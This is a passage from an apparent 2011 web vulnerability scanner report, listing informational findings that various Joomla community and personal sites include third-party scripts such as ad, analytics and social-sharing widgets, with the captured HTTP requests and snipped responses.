...[SNIP]...
</script>
<script type="text/javascript" src="http://www.google.com/afsonline/show_afs_search.js"></script>
...[SNIP]...

21.1098. http://www.joomla.org.hu/joomla/46-kiadasok/272-megerkezett-a-joomla-16.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.joomla.org.hu
Path:   /joomla/46-kiadasok/272-megerkezett-a-joomla-16.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /joomla/46-kiadasok/272-megerkezett-a-joomla-16.html HTTP/1.1
Host: www.joomla.org.hu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:12:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: a3c8e20ef07ced04de7a742c67ea7041=c47f7e47ae59d11b65fa8cc931aa7381; path=/
Set-Cookie: juah_tpl=juah; expires=Sat, 14-Jan-2012 15:12:03 GMT; path=/
Last-Modified: Mon, 24 Jan 2011 15:12:03 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 32201


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="hu-hu" lang="hu-hu">
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.1099. http://www.joomla.org.tw/news/joomla-official-news/163-joomla16-arrived

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.joomla.org.tw
Path:   /news/joomla-official-news/163-joomla16-arrived

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share

Request

GET /news/joomla-official-news/163-joomla16-arrived HTTP/1.1
Host: www.joomla.org.tw
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:01:14 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: a798c6463d2f54ee9d166568119e0c09=806uqp0b11fh0lrh0emunokum3; path=/
Last-Modified: Mon, 24 Jan 2011 16:01:14 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 56494

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="zh-tw" lang="zh-tw" dir="
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</span><script src='http://static.ak.fbcdn.net/connect.php/js/FB.Share' type='text/javascript'></script>
...[SNIP]...
</div>
       <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#pub=eyesofkids"></script>
...[SNIP]...

21.1100. http://www.joomlacommunity.eu/nieuws/joomla-versies/572-joomla-16-nu-beschikbaar.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.joomlacommunity.eu
Path:   /nieuws/joomla-versies/572-joomla-16-nu-beschikbaar.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.joomlacommunity.eu/www/delivery/spcjs.php?id=1&block=1
  • http://platform.twitter.com/widgets.js
  • http://www.google.com/jsapi

Request

GET /nieuws/joomla-versies/572-joomla-16-nu-beschikbaar.html HTTP/1.1
Host: www.joomlacommunity.eu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:01:07 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: f2b89666f144681ba17ab9a0996f50e0=fc830a5138c7cd5b8f7f3fa60df9a70c; path=/
Last-Modified: Mon, 24 Jan 2011 16:01:12 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 64750


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script src="http://www.jo
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.joomlacommunity.eu/www/delivery/spcjs.php?id=1&amp;block=1"></script>
...[SNIP]...
</div>
   <script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
   
   <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

21.1101. http://www.joomlacorner.com/joomla-news/608-joomla-16-has-arrived.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.joomlacorner.com
Path:   /joomla-news/608-joomla-16-has-arrived.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://platform.twitter.com/widgets.js
  • http://www.google.com/buzz/api/button.js

Request

GET /joomla-news/608-joomla-16-has-arrived.html HTTP/1.1
Host: www.joomlacorner.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:16:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.16
Set-Cookie: 992260232bef5a730b1bd291176df96d=4a98f8c53f4541210928f4c67e558242; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: ja_anion_tpl=ja_anion; expires=Sat, 14-Jan-2012 15:16:02 GMT; path=/
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 15:16:02 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 31997

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="th-th" lang="th-th">

...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://www.google.com/buzz/api/button.js"></script>
...[SNIP]...
</script> <script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.1102. http://www.joomlainorge.no/nyheter/joomla/552-joomlar-16-er-utgitt

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.joomlainorge.no
Path:   /nyheter/joomla/552-joomlar-16-er-utgitt

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /nyheter/joomla/552-joomlar-16-er-utgitt HTTP/1.1
Host: www.joomlainorge.no
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:15:22 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 536a515975b0bb224c84dbf364570dc5=d25c0652ad8dc304e171cefb60e2e9c9; path=/
Last-Modified: Mon, 24 Jan 2011 15:15:25 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 42125

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="nb-no" lang="nb-no" dir=
...[SNIP]...
<div class="module mod-blank ">

   
           <script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...

21.1103. http://www.joomlapt.com/comunidade-joomlapt/139-joomla-16-ja-chegou.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.joomlapt.com
Path:   /comunidade-joomlapt/139-joomla-16-ja-chegou.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://platform.twitter.com/widgets.js

Request

GET /comunidade-joomlapt/139-joomla-16-ja-chegou.html HTTP/1.1
Host: www.joomlapt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:55:51 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: d4dad6935f632ac35975e3001dc7bbe8=ojepc2gnaddk51l2fk130dsb57; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: ja_social_tpl=ja_social; expires=Sat, 14-Jan-2012 15:55:51 GMT; path=/
Expires:
Cache-Control: private
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 32648

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns="http://www.w3.org
...[SNIP]...
</a>
           <script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...

21.1104. http://www.joomlaworks.gr/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.joomlaworks.gr
Path:   /

Issue detail

The response dynamically includes the following script from another domain:
  • http://edge.quantserve.com/quant.js

Request

GET / HTTP/1.1
Host: www.joomlaworks.gr
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:41:43 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.14
Cache-Control: must-revalidate, max-age=300
Vary: Accept-Encoding
Set-Cookie: 0a45d56f2a275da98a648042c845f6cd=-; path=/
Set-Cookie: mosvisitor=1
Connection: close
Content-Type: text/html
Content-Length: 39827

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Conten
...[SNIP]...
</script>
       <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

21.1105. http://www.jt.gen.tr/makaleler/46-joomla-16.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jt.gen.tr
Path:   /makaleler/46-joomla-16.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://aff3.gittigidiyor.com/affiliate_front.js

Request

GET /makaleler/46-joomla-16.html HTTP/1.1
Host: www.jt.gen.tr
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:01:14 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 619eb53f4a8cd392a6fe48a16c891436=63427cbf922f139568c46da3ddcb18be; path=/
Last-Modified: Mon, 24 Jan 2011 16:01:15 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21921

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="tr-tr" lang="tr-tr" >
<he
...[SNIP]...
</script>
<script type="text/javascript" src="http://aff3.gittigidiyor.com/affiliate_front.js"></script>
...[SNIP]...

21.1106. http://www.kbsp.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kbsp.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:
  • http://maps.google.com/maps?file=api&v=2&sensor=true&key=ABQIAAAAxCip-gGCAXccz8s_drNA0hQjlO8ejvnFOJwkGC7FWE6SwXx7OhTheCliB7m0cgu436m-QrV81GClBQ

Request

GET / HTTP/1.1
Host: www.kbsp.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:04:54 GMT
Server: Apache/2.2.9 (Unix) PHP/5.2.6 mod_ssl/2.2.9 OpenSSL/0.9.7l DAV/2 mod_jk/1.2.23 mod_fastcgi/2.4.2 mod_scgi_pubsub/1.11-pubsub mod_perl/2.0.2 Perl/v5.8.8
Last-Modified: Thu, 02 Dec 2010 20:39:41 GMT
ETag: "97908-80e8-496736bcf5d40"
Accept-Ranges: bytes
Content-Length: 33000
Cache-Control: max-age=60
Expires: Mon, 24 Jan 2011 22:05:54 GMT
MS-Author-Via: DAV
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<me
...[SNIP]...
</script>


<script src="http://maps.google.com/maps?file=api&amp;v=2&amp;sensor=true&amp;key=ABQIAAAAxCip-gGCAXccz8s_drNA0hQjlO8ejvnFOJwkGC7FWE6SwXx7OhTheCliB7m0cgu436m-QrV81GClBQ" type="text/javascript"></script>
...[SNIP]...

21.1107. http://www.kelvinluck.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kelvinluck.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://stats.wordpress.com/e-201104.js
  • http://twitter.com/javascripts/blogger.js
  • http://twitter.com/statuses/user_timeline/vitch.json?callback=twitterCallback2&count=5

Request

GET / HTTP/1.1
Host: www.kelvinluck.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:41:45 GMT
Server: Apache
X-Pingback: http://www.kelvinluck.com/xmlrpc.php
Last-Modified: Tue, 25 Jan 2011 04:35:17 GMT
Vary: Accept-Encoding
Content-Length: 106212
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>The personal webl
...[SNIP]...
</a>
       <script type="text/javascript" src="http://twitter.com/javascripts/blogger.js"></script>
       <script type="text/javascript" src="http://twitter.com/statuses/user_timeline/vitch.json?callback=twitterCallback2&amp;count=5"></script>
...[SNIP]...
<!--stats_footer_test--><script src="http://stats.wordpress.com/e-201104.js" type="text/javascript"></script>
...[SNIP]...

21.1108. http://www.kwitco.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kwitco.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:
  • http://s3.chuug.com/chuug.twitthis.scripts/twitthis.js

Request

GET / HTTP/1.1
Host: www.kwitco.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:42:41 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.7a mod_fcgid/2.3.5 Phusion_Passenger/2.2.15 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.16
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Set-Cookie: exp_last_visit=980592161; expires=Wed, 25-Jan-2012 04:42:41 GMT; path=/
Set-Cookie: exp_last_activity=1295952161; expires=Wed, 25-Jan-2012 04:42:41 GMT; path=/
Set-Cookie: exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D; path=/
Last-Modified: Tue, 25 Jan 2011 04:42:41 GMT
Connection: close
Content-Type: text/html
Content-Length: 8240

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title>Kwittk
...[SNIP]...
<meta name="doc-class" content="Living Document" />
<script type="text/javascript" src="http://s3.chuug.com/chuug.twitthis.scripts/twitthis.js"></script>
...[SNIP]...

21.1109. http://www.laptoptips.ca/javascripts/shutter-reloaded/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.laptoptips.ca
Path:   /javascripts/shutter-reloaded/

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.google-analytics.com/urchin.js

Request

GET /javascripts/shutter-reloaded/ HTTP/1.1
Host: www.laptoptips.ca
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:03:35 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.7a mod_fcgid/2.3.5 Phusion_Passenger/2.2.15 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.16
X-Pingback: http://www.laptoptips.ca/wpd/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28705

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head profile="http://
...[SNIP]...
</script>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

21.1110. http://www.linkagogo.com/go/AddNoPopup

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.linkagogo.com
Path:   /go/AddNoPopup

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.google-analytics.com/urchin.js

Request

GET /go/AddNoPopup HTTP/1.1
Host: www.linkagogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:41:52 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8b Resin/3.1.4
ETag: "AAAAS27elZo"
Last-Modified: Tue, 25 Jan 2011 04:41:53 GMT
Cache-Control: no-cache
Expires: 0
Content-Length: 16308
Set-Cookie: cookies=Y; path=/
Set-Cookie: user=-1; path=/; expires=Mon, 16-Jan-2012 04:41:52 GMT
Set-Cookie: userName=guest; path=/; expires=Mon, 16-Jan-2012 04:41:52 GMT
Content-Type: text/html; charset=utf-8
Connection: close

<html lang="eng-US">
<head>
<link rel="search" type="application/opensearchdescription+xml" href="/addons/linkagogo_search.xml" title="linkaGoGo favorites search" />
<link rel="search" type="applicati
...[SNIP]...
</table>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

21.1111. http://www.littlewebthings.com/projects/countdown/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.littlewebthings.com
Path:   /projects/countdown/

Issue detail

The response dynamically includes the following script from another domain:
  • http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /projects/countdown/ HTTP/1.1
Host: www.littlewebthings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:07:33 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 13208
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <l
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4b7d83ac7ec1a444"></script>
...[SNIP]...

21.1112. http://www.lynda.com/landing/softwaretraining.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lynda.com
Path:   /landing/softwaretraining.aspx

Issue detail

The response dynamically includes the following script from another domain:
  • https://lct.salesforce.com/sfga.js

Request

GET /landing/softwaretraining.aspx?AWKeyWord=Joomla!&CourseURL=http%3a%2f%2fwww.lynda.com%2fhome%2fViewCourses.aspx%3flpk0%3d370&Ptitle=Joomla+Tutorials+and+Training+Online&_kk=joomla%20course&_kt=546081e7-492f-4261-b08e-49b0a582fb58/ HTTP/1.1
Host: www.lynda.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=KWWVWPSw4CYMO; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=pzpdm555fipjxc55k40s5iaj; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=pzpdm555fipjxc55k40s5iaj; path=/; HttpOnly
Set-Cookie: course_settings_0=; expires=Mon, 14-Feb-2011 04:43:19 GMT; path=/
Set-Cookie: SITE=OLD; expires=Tue, 08-Feb-2011 04:43:19 GMT; path=/
Set-Cookie: TollFree=3; expires=Tue, 08-Feb-2011 04:43:19 GMT; path=/
X-Powered-By: ASP.NET
From: 284440-web4
Date: Tue, 25 Jan 2011 04:43:19 GMT
Connection: close
Content-Length: 24612


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1">
<!-- Google
...[SNIP]...
</BODY> tag -->
<script type="text/javascript" src="https://lct.salesforce.com/sfga.js"></script>
...[SNIP]...

21.1113. http://www.masjo.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.masjo.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET / HTTP/1.1
Host: www.masjo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=143117481.1295903077.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/30; __utma=143117481.1825936610.1295903073.1295903073.1295903073.1; __utmc=143117481; __utmb=143117481.1.10.1295903073;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:08:10 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/4.4.9 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.2.15
Vary: Accept-Encoding,Cookie
Cache-Control: max-age=300, must-revalidate
WP-Super-Cache: Served supercache file from PHP
Content-Length: 44976
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.1114. http://www.masjo.com/search/learn+typing+quick+and+easy+crack/page/419/x22

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.masjo.com
Path:   /search/learn+typing+quick+and+easy+crack/page/419/x22

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /search/learn+typing+quick+and+easy+crack/page/419/x22 HTTP/1.1
Host: www.masjo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:01:35 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/4.4.9 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.2.15
Vary: Accept-Encoding,Cookie
Cache-Control: max-age=300, must-revalidate
WP-Super-Cache: Served supercache file from PHP
Content-Length: 63607
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.1115. http://www.masjo.com/wp-content/plugins/search-permalink.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.masjo.com
Path:   /wp-content/plugins/search-permalink.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /wp-content/plugins/search-permalink.php HTTP/1.1
Host: www.masjo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=143117481.1295903077.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/30; __utma=143117481.1825936610.1295903073.1295903073.1295903073.1; __utmc=143117481; __utmb=143117481.1.10.1295903073;

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:07:51 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/4.4.9 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.2.15
X-Pingback: http://www.masjo.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Tue, 25 Jan 2011 00:07:51 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20127

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.1116. http://www.mathias-bank.de/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mathias-bank.de
Path:   /

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.google-analytics.com/urchin.js

Request

GET / HTTP/1.1
Host: www.mathias-bank.de
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:44:19 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Pingback: http://www.mathias-bank.de/xmlrpc.php
Set-Cookie: bb2_screener_=1295930659+173.193.214.243; path=/
